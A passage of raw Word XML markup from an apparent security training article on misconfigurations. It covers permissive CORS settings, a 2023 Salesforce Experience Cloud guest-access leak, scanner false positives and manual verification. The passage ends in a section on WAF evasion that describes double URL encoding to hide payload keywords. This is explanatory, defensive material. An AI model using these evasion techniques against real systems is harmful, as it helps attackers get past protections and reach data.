                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>-Control-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>Allow-Origin: *</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>credentals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> enabled, allowing any</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>malicious domain to make cross-origin</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">requests to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>API.</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Verbosity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> in</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Response </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Formats:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>JSON</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> error</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>structures returning low-level database</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>structural errors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="051CAC31" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Real-World Example: Salesforce Communities Leak (2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38068A6D"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What Went Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF93B08"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 xml:space="preserve">In 2023, security researchers discovered a widespread, critical security misconfiguration affecting numerous organizations using </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Salesforce Experience Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (formerly Salesforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A8E08"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Communities). The platform allows enterprises to quickly construct public-facing portals for customers or partners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66078093"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 xml:space="preserve">The core vulnerability was an operational misconfiguration regarding </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Guest User Access Control Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Organizations rapidly spinning up digital portals failed to harden the default object-level permissions. As a result, the access control settings were left improperly configured to allow "Guest Users" (anonymous internet traffic) to query backend objects and records that should have required valid employee or customer authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC8608"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The Exploit &amp; Fallout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0EB9B2"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Attackers used automated scanning scripts to identify target Salesforce endpoints. By querying hidden REST API endpoints tied to these portals, they were able to extract structural datasets without providing credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F6C4E0"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The fallout was massive and global:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB655E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Data Leaked:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The misconfiguration exposed millions of rows of sensitive Personal Identifiable Information (PII), corporate financial logs, and healthcare data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CB67F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impacted Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Major banks, insurance agencies, and government portals were impacted. Notably, Vermont’s Pandemic Unemployment Assistance system had to be temporarily taken offline after it was discovered that the misconfiguration leaked applicant Social Security Numbers (SSNs), bank routing numbers, and home addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11ED78" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Lesson:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This incident perfectly demonstrated that an application framework can be fundamentally secure, but if the operational setup fails to strictly lock down default access baselines, severe data breaches occur without the attacker ever writing a single line of malicious code exploit payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CFEB6F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Advanced Detection &amp; False Positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887EF2C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. The False Positive Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF2967"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Automated vulnerability scanners (like DAST or network scanners) operate primarily on signatures, heuristics, and generalized request-response expectations. Because they look at environments abstractly, they frequently flag false positives regarding Security Misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1413A8"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Common False Positive Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0042F990" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The "Generic Error" Mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A scanner injects malformed array input to force an exception. The server returns an HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>500 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing an internally generated, user-friendly debug tracking ID (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Error ID: ERR-90812</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). The scanner's signature engine matches the word "Error" and the presence of a 500 status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246CC183"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 xml:space="preserve">code, automatically flagging it as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Verbose Error Handling / Information Leakage</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , even though no sensitive structural stack trace was revealed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B487AE8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Custom Framework Routing Redirection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A scanner tests for an unremoved admin console by fuzzing common paths like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/manager/html</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If the application handles unauthenticated routes by transparently rewriting the URL or serving a generic custom 200 OK landing page (without redirecting), the scanner thinks it successfully hit a live administrative login portal, flagging a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A006FA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Third-Party Managed Cloud Storage Proxies:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanner flags a cloud storage bucket configuration file because its access control is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>public-read</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . However, in practice, the bucket only hosts completely public, non-sensitive static assets (like application UI CSS, fonts, or open product logos) where a public configuration is intended and secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64385F7D"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Manual Verification Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B420DD"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To bypass alert fatigue and save critical engineering hours, security teams manually verify these findings using targeted, behavioral interception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DB20C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manual Header Context Inspection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a scanner flags a missing security header (like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), manually inspect the exact nature of the page using </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>curl -I https://target.com/path</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If the endpoint is merely a stateless, static placeholder that processes no user input, session cookies, or scripting, the absence of the header is operationally risk-free and can be safely down-voted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6384688C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Explicit Response Body Diffing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> For flagged administrative console paths, open an intercepting proxy (like Burp Suite) and repeat the scanner’s request. Diff the response body against a known non-existent page request (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/this-does-not-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>existxyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If the response length, hash, and DOM structure match perfectly, the scanner fell victim to a custom routing rule, proving the vulnerability is absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ABBC2B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E9A61"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lastRenderedPageBreak/>
        <w:t>When advanced attackers encounter defensive boundaries like Web Application Firewalls (WAFs) protecting an unhardened server configuration, they use structural obfuscation and request manipulation to slip past rigid signature patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455767F"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Payload Obfuscation &amp; Multi-Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAFB855"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 xml:space="preserve">If a WAF uses raw regular expressions to scan incoming parameters for keywords like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or administrative commands, attackers disguise these keywords using alternative encoding configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F78B0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Double URL Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A WAF may decode a parameter once before checking its rules. An attacker sends a payload where character strings are double URL encoded (e.g.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305A950"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 xml:space="preserve">changing an absolute path character </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%252f</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
